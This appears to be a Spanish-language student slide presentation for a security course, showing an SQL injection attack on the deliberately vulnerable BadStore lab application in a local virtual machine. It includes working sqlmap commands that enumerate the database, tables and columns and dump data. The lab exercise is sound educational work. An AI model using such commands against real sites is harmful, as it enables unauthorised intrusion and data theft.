ataque por inyección de código sql
DESCRIPTION
Ataque realizado a la base de datos de Badstore, con lo cual se debe obtener toda la información sobre la base de datos por ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las tablas, información de las tablas, información de las columnas, etc.TRANSCRIPT
![Page 1: Ataque por inyección de código sql](https://reader036.vdocumento.com/reader036/viewer/2022062313/558c6d52d8b42a82298b4656/html5/thumbnails/1.jpg)
Especialización en Seguridad Informática
Ataque por inyección de código SQL,
JOSÉ ALFREDO RAMÍREZ PRADA
Espinal, Septiembre de 2014
![Page 2: Ataque por inyección de código sql](https://reader036.vdocumento.com/reader036/viewer/2022062313/558c6d52d8b42a82298b4656/html5/thumbnails/2.jpg)
Ataque a la base de datos de Badstore
Una vez instalada la máquina virtual se procede a la configuración para instalar BadStore, se instala la aplicación Python 2.7.8.
![Page 3: Ataque por inyección de código sql](https://reader036.vdocumento.com/reader036/viewer/2022062313/558c6d52d8b42a82298b4656/html5/thumbnails/3.jpg)
Ataque a la base de datos de Badstore
una vez iniciada la maquina virtual "BADSTORE", por medio del comando IFCONFIG, obtenemos la dirección IP (192.168.56.101) a la cual acceder desde nuestro explorador, con el fin de identificar las vulnerabilidades de Sql Injections, por ejemplo se introduce una comilla en el campo “Search” del formulario "What´s New", y observamos un mensaje de error SQL.
![Page 4: Ataque por inyección de código sql](https://reader036.vdocumento.com/reader036/viewer/2022062313/558c6d52d8b42a82298b4656/html5/thumbnails/4.jpg)
Ataque a la base de datos de BadstoreIdentificada la vulnerabilidad, podemos atacar por medio de la consola de comando de Windows, ubicados en el directorio C:\sqlmap
sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" --current-db
Se confirma la vulnerabilidad y sqlmap ha sido capaz de detectar el motor de base de datos MySQL 4 y el servidor Web Apache 1.3.28, el nombre de la base de datos 'BADSTOREDB'.
![Page 5: Ataque por inyección de código sql](https://reader036.vdocumento.com/reader036/viewer/2022062313/558c6d52d8b42a82298b4656/html5/thumbnails/5.jpg)
Ataque a la base de datos de Badstore
Seguidamente podemos identificar las tablas de la Base de Datos por medio del comando:
sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" -D badstoredb --tables
![Page 6: Ataque por inyección de código sql](https://reader036.vdocumento.com/reader036/viewer/2022062313/558c6d52d8b42a82298b4656/html5/thumbnails/6.jpg)
Ataque a la base de datos de Badstore
una vez identificada la tabla (itemdb) podremos identificar información de las columnas y de los campos, correspondientemente con los siguientes comandos:
sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" -D badstoredb -T itemdb --columns
sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" -D badstoredb -T itemdb -C ldesc --dump
![Page 7: Ataque por inyección de código sql](https://reader036.vdocumento.com/reader036/viewer/2022062313/558c6d52d8b42a82298b4656/html5/thumbnails/7.jpg)
Ataque a la base de datos de Badstore
De esta forma obtenemos toda la información sobre la base de datos de Badstore.
![Page 8: Ataque por inyección de código sql](https://reader036.vdocumento.com/reader036/viewer/2022062313/558c6d52d8b42a82298b4656/html5/thumbnails/8.jpg)
Especialización en Seguridad Informática
GRACIAS POR SU ATENCIÓN